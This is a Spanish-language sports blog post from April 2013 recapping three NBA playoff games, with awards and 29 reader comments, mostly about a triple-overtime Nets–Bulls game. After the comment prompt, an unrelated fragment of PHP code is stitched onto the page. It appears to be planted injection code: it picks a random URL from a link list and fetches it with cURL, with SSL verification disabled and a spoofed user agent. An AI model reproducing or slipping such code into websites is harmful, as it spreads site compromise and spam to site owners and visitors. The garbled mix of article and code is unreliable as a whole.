La crónica: Fin de ciclo

27 de April de 2013 por MagicJohnson32

dh12Las temporadas de Lakers y Celtics penden de un hilo. Ambos encajaron anoche una nueva derrota en sus respectivas series y no sólo están ambos 0-3 y a una derrota de las vacaciones, sino que se sienten más inferiores que nunca a sus rivales. Huérfanos de sus líderes, Rondo por un lado y Kobe por el otro, Boston y LA apenas han supuesto una amenaza para Knicks y Spurs a lo largo de todos los partidos disputados hasta el momento, y menos aún anoche. Los angelinos, los de de la plantilla de los 100 millones de dólares, saltaron al Staples con un backcourt compuesto por Darius Morris y Goudelock, sus elecciones de segunda ronda del draft 2011. A la baja de Bryant se le han sumado las de los otros tres guards de la plantilla que contaban con minutos, Nash, Blake y Meeks, y así, en un must win absoluto para los Lakers, éstos encajaron la peor derrota como locales de su historia. Tim Duncan y Tony Parker camparon a sus anchas desde el salto inicial, los Lakers estuvieron inoperantes en ataque y perdidos en defensa, y la distancia en el marcador no hizo más que estirarse hasta el humillante 120-89 final. Howard, Morris y Goudelock lograron buenos números, y Gasol incluso obtuvo un nuevo triple doble, pero el partido perteneció a Duncan y no hubo un solo apartado del juego en el que no se impusieran los Spurs. Por supuesto, los Lakers sufrieron una nueva lesión, la de un Metta World Peace que se resintió de la rodilla y probablemente cause baja el domingo. Tened vuestros teléfonos a mano, porque tal vez os llame Mitch Kupchack. Los Spurs cerrarán casi con toda seguridad la serie a la primera oportunidad, más motivados que nunca tras ver cómo la lesión de Westbrook les abre de par en par las puertas a las Finales.

pp kgLa misma emoción -es decir, ninguna- hubo en Boston, donde esperábamos unos Celtics más combativos y lo que encontramos fue la misma incapacidad para superar la defensa de los Knicks que en los dos partidos anteriores. Los verdes, que volvieron a quedarse por debajo de los 80 puntos y promedian 75 puntos en esta serie tras el 90-76 de anoche, tuvieron más pérdidas (17) que asistencias (14) y acusaron los mismos problemas de noches anteriores: la ineficacia de Pierce y Garnett, la falta de contribuciones del banquillo (pese a que Rivers probó con Terry de inicio en lugar de Bass) y la ausencia de un creador de juego. La aportación de Bradley, tras un primer partido correcto, tiende a 0 (anoche, 2 puntos, 1 rebote, 0 asistencias, 1 robo y 1 pérdida fue todo lo que hizo en 33 minutos). No es que los Knicks brillasen especialmente, pero la defensa funcionó a la perfección y la anotación llega casi sola. 26 logró de Melo, 15 con 10 asistencias de un Felton muy superior a sus pares y 15 de JR Smith antes de que se le cruzasen los cables y fuese descalificado por un codazo a Terry. Los neoyorquinos disponen el domingo de la primera ocasión para sentenciar la serie. Esperamos, de todos modos, un arranque de orgullo de los Celtics que alargue la serie al menos para evitar la barrida y volver al Madison.

curry nuggsPara tener garantías de que veremos un partido bonito, hay que irse a la eliminatoria que juegan Warriors y Nuggets. De hecho, sobra con disfrutar únicamente de Stephen Curry, al que se le suponía dudoso para el partido y que, en cambio, volvió a salirse en la victoria de los suyos 108-110, que pone la serie 2-1 para los de Oakland. Enfrente tuvo a un gran Lawson, que se encargó de sostener a los Nuggets hasta el último instante. Los últimos 90 segundos de partido, a los que se llegó con 3 puntos de ventaja para los Warriors, fueron una locura e incluyeron 4 pérdidas de balón. Golden State anotaron únicamente 2/4 tiros libres pero el intento desesperado de Iguodala desde el medio del campo no entró (por poco) y los Nuggets se ven por detrás y con serios problemas para parar el ataque rival. Klay Thompson estuvo muy gris pero lo compensaron Jack, Barnes y Landry, además de Curry, otra vez sensacional con 29 puntos y 11 asistencias. Lawson lideró a los suyos con 35-10, y aunque Faried, Brewer, Iguodala y Chandler cumplieron, la horrible actuación de Andre Miller acabó saliendo cara a los de George Karl.

PREMIOS

MVP: 29 puntos, 11 asistencias, 6 rebotes, 2 robos y todo un recital a cargo de Steph Curry, al que sólo el gran Tim Duncan le discute el premio con sus 26 puntos (12/16 tiros), 9 rebotes, 3 asistencias, 1 robo y 1 tapón. La clase al poder.

Rookie: la baja de David Lee le ha sentado bien a Harrison Barnes, autor anoche de 19 puntos, 7 rebotes, 2 asistencias y 1 robo. Hay jugadorazo para rato.

La sorpresa: Sin Kobe, ni Nash, ni Blake, ni Meeks, alguien tenía que hacer números en el perímetro de los Lakers. Fueron Darius Morris y Andrew Goudelock, que aprovecharon las minutadas que les dio D’Antoni para adornar su estadística de Playoffs. Morris logró 24 puntos y 6 asistencias; G-lock, por su parte, anotó 20 puntos y robó 3 balones.

La decepción: Andre Miller fue el héroe del primer partido, pero desde entonces las cosas no le van tan bien. Como prueba, su 2 de 13 en tiros de campo y el -9 que encajaron los Nuggets durante sus 27 minutos en pista anoche en Oakland.

Mayor esfuerzo en vano: no le faltó mucho a Ty Lawson para conducir a los Nuggets al triunfo en el ORACLE Arena. Su aportación fueron 35 puntos (11/22 en tiros de campo, 12/12 en libres), 10 asistencias, 3 rebotes y 2 robos.

TOP 5

Imágenes | AP Photos / Getty Images

Comenta

29 comentarios a esta entrada

  1. OtroNarcisista dice:
    #1

    Relleno los premios por ti.

    MVP: Stephen Curry. No hay discusión posible.

    Rookie: Harrison Barnes. Segundo doble-doble consecutivo.

    Sorpresa: Corey Brewer. Buen partido.

    Decepción: Un partido muy gris de Klay Thompson, y de Andre Miller.

    Esfuerzo en vano: Obviamente, Ty Lawson.

    ¿Por qué todos los premios son del GSW-DEN? Pues porque los otros dos partidos, con perdón, no tuvieron la intensidad que se espera de unos playoffs.

      Citar

  2. MagicJohnson32 dice:
    #2

    Jaja, gracias, he publicado la crónica mientras completaba los premios. Ya ves que coincidimos bastante 😉

      Citar

  3. nba dice:
    #3

    Humillacion en el Staples, que gusto ver a la defensa de Spurs cerrarse sobre Howard cada vez que recibia el balon, mala noticia lo de MWP. Decidira D’antoni darle una oportunidad a Ebanks o nos tendra que llamar a nosotros para suplir su baja, se avecina un verano muy interesante en Lakers en los que no se va a salvar ni el apuntador

      Citar

  4. Ruxixón dice:
    #4

    nba:
    Humillacion en el Staples, que gusto ver a la defensa de Spurs cerrarse sobre Howard cada vez que recibia el balon, mala noticia lo de MWP. DecidiraD’antoni darle una oportunidad a Ebanks o nos tendra que llamar a nosotros para suplir su baja, se avecina un verano muy interesante en Lakers en los que no se va a salvar ni el apuntador

    Pues están condenados a entenderse.Yo me la jugaría a que D’Antoni sigue (error),que renuevan a Howard (no hacen nada sin el dinero que éste libera) y que Gasol no pasa por la amnistía,si no que lo usaran como carne de traspaso cuando libere salario si las cosas no pintan bien.Vamos,que segurián por la misma línea.Mi máxima preocupación es Nash que con sus problemas físicos y la mierda de epidurales y demás a saber qué nivel tendrá la próxima campaña.

    Por los Celtics,¿que creeis que harán Paul Pierce y Garnett?El primero Player Option y el segundo puede rescindir su contrato si desea retirarse.

      Citar

  5. MagicJohnson32 dice:
    #5

    Ruxixón: Pues están condenados a entenderse.Yo me la jugaría a que D’Antoni sigue (error),que renuevan a Howard (no hacen nada sin el dinero que éste libera) y que Gasol no pasa por la amnistía,si no que lo usaran como carne de traspaso cuando libere salario si las cosas no pintan bien.Vamos,que segurián por la misma línea.Mi máxima preocupación es Nash que con sus problemas físicos y la mierda de epidurales y demás a saber qué nivel tendrá la próxima campaña.

    Por los Celtics,¿que creeis que harán Paul Pierce y Garnett?El primero Player Optiony el segundo puede rescindir su contrato si desea retirarse.

    D’Antoni seguirá. Que Howard renueve es cosa del jugador. Creo que lo hará pero quién sabe. Gasol no será amnistiado, en todo caso MWP (de hecho, me extrañaría lo contrario). A Pau supongo que buscarán traspasarlo, aunque es más fácil que el traspaso llegue cerca del trade deadline que en verano. Nash tiene 5 meses para recuperarse. Este año tuvo la desgracia de lesionarse de gravedad en el 2º partido, y a partir de ahí nunca llegó a estar realmente sano.

    De los Celtics, yo creo que seguirán ambos.

      Citar

  6. MagicJohnson32 dice:
    #6

    Por cierto, a las 20h00 juegan Nets-Bulls, y a las 22h30 Clippers-Grizzlies.

      Citar

  7. HisRoyalAirness dice:
    #7

    Soy yo Howard y me voy cagando leches de allí. Me voy a un equipo con un buen base y tiradores y paso de D´Antoni y de compartir protagonismo con Kobe

      Citar

  8. Denise dice:
    #8

    Pues yo no entiendo las ganas de revolucionar todo en L.A. y no dejar titeres con cabeza. La temporada ha sido mala, pero ha habido muchas lesiones. Yo particularmente mantendría el bloque, renovando a Howard, manteniendo a Gasol, y si hay que echar alguien que sea a D’Antoni.

      Citar

  9. R1Molano dice:
    #9

    Si, pero pierde dinero del año adicional y el tema de marketing de jugar en los Lakers.

    Lo nuestro una gozada. Vaya como estaba el Oracle

      Citar

  10. Denise dice:
    #10

    HisRoyalAirness:
    Soy yo Howard y me voy cagando leches de allí. Me voy a un equipo con un buen base y tiradores y paso de D´Antoni y de compartir protagonismo con Kobe

    La cosa va a estar entre renovar por Lakers o pirarse a Dallas con el amigo Cuban que siempre garantiza buenos proyectos y pasta de por medio; a Houston que tiene un gran futuro por delante con Harden y con tanto buen jugador en contrato rookie; o irse a Atlanta que es su ciudad natal.
    Personalmente, creo que acabará renovando para que nadie diga que su paso por L.A. fue un fracaso y abandonó el barco a las primeras de cambio.

      Citar

  11. Denise dice:
    #11

    Por cierto, una “buena” noticia para Orlando Magic, es que Marcus Smart está replanteando su decisión, y podría declararse elegible para el próximo Draft.
    Yo a este chaval no lo conozco, no sé si es bueno o malo, pero es un secreto a voces que Orlando va detrás de él, y si se presenta, va a ser un Top 4 seguro.
    Si se queda otro año en la NCAA, no estoy tan seguro que en el Draft del 2014 vaya a ser escogido en un pick tan alto…y siempre puede haber una lesión que te trunque tu carrera y no te pueda resolver tu vida.

      Citar

  12. M dice:
    #12

    Que superpang haga lo que quiera. Pero menos abrir la boca y más aprender como funciona el juego al que juega.

      Citar

  13. MagicJohnson32 dice:
    #13

    HisRoyalAirness:
    Soy yo Howard y me voy cagando leches de allí. Me voy a un equipo con un buen base y tiradores y paso de D´Antoni y de compartir protagonismo con Kobe

    ¿Compartir protagonismo? Eso es lo que habríamos querido los fans de los Lakers, que Kobe no hubiese tenido que asumir tanta responsabilidad y tantos minutos. Pero Howard (ni nadie) no ha estado al nivel (por motivos propios y ajenos, ojo).

      Citar

  14. Ruxixón dice:
    #14

    La que ha liado KryptoNate en los instantes finales de un partido que tenían ganado los Nets.Overtime!

      Citar

  15. rumbero dice:
    #15

    Ruxixón:
    La que ha liado KryptoNate en los instantes finales de un partido que tenían ganado los Nets.Overtime!

    Una pasada, microondas en estado puro…y lo bien que se lo pasa Thibo con él 😀
    Tenía pensado ver el Grizzlies – Clippers pero habrá que esperarse q la prórroga promete

      Citar

  16. Ruxixón dice:
    #16

    Vaya canasta de JJ ahora,de póster como ha salvado con su tiro a 4 Bulls,11 segundos para lo que quiera Chicago.

      Citar

  17. Ruxixón dice:
    #17

    Jajjajajajjajajaja,la que lío el enano,madre del amor hermoso.Jugador franquicia

      Citar

  18. MagicJohnson32 dice:
    #18

    Alucinante ¡¡qué partido!!

      Citar

  19. Ruxixón dice:
    #19

    “El señor de los 20 millones”

      Citar

  20. MagicJohnson32 dice:
    #20

    Ruxixón:
    “El señor de los 20 millones”

    El señor de los buzzer beaters. Bestial.

      Citar

  21. rumbero dice:
    #21

    JoJo para el OT2! Que partido por dios!
    Independientemente de como acabe, el partido de Robinson es de lo más bestia que recuerdo en bastante tiempo

      Citar

  22. MagicJohnson32 dice:
    #22

    rumbero:
    JoJo para el OT2! Que partido por dios!
    Independientemente de como acabe, el partido de Robinson es de lo más bestia que recuerdo en bastante tiempo

    Bueno, en realidad sus 3 primeros cuartos son de lo más mediocre, pero a quién le importa!!

      Citar

  23. Ruxixón dice:
    #23

    Otra prórroga nos lleva a uno de los encuentros de mayor duración en los PO pero no rompería el récord establecido en 4 prórrogas en un Celtics – Syracuse del año 53

      Citar

  24. Ruxixón dice:
    #24

    3 OT!

      Citar

  25. rumbero dice:
    #25

    MagicJohnson32: Bueno, en realidad sus 3 primeros cuartos son de lo más mediocre, pero a quién le importa!!

    Eso es lo que lo hace más increible. Ese loco bajito.
    A ver como les va a los Bulls sin él en el OT3..

      Citar

  26. Jose Luis dice:
    #26

    Increíble partido, el resumen de mañana de NBA.com cuanto durará? espero que al menos 5 minutos, por favor

      Citar

  27. Ruxixón dice:
    #27

    Increíble,ahora aparece Mohammed con dos acciones definitivas para el encuentro,prácticamente imposible para Nets.Miami frotándose las manos con este partido.

      Citar

  28. MagicJohnson32 dice:
    #28

    El Bulls-Nets ha sido tal locura que ha dejado algunas estadísticas tremendas. Por ejemplo: Kirk Hinrich ha jugado 60 minutos y el partido ha durado más de 4 horas.

      Citar

  29. rumbero dice:
    #29

    Ruxixón:
    Increíble,ahora aparece Mohammed con dos acciones definitivas para el encuentro,prácticamente imposible para Nets.Miami frotándose las manos con este partido.

    Pues si, aunque me da que aun estando a lo suyo hubieran estado más contentos con un 2-2. Se les pone muy bien a los Bulls

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>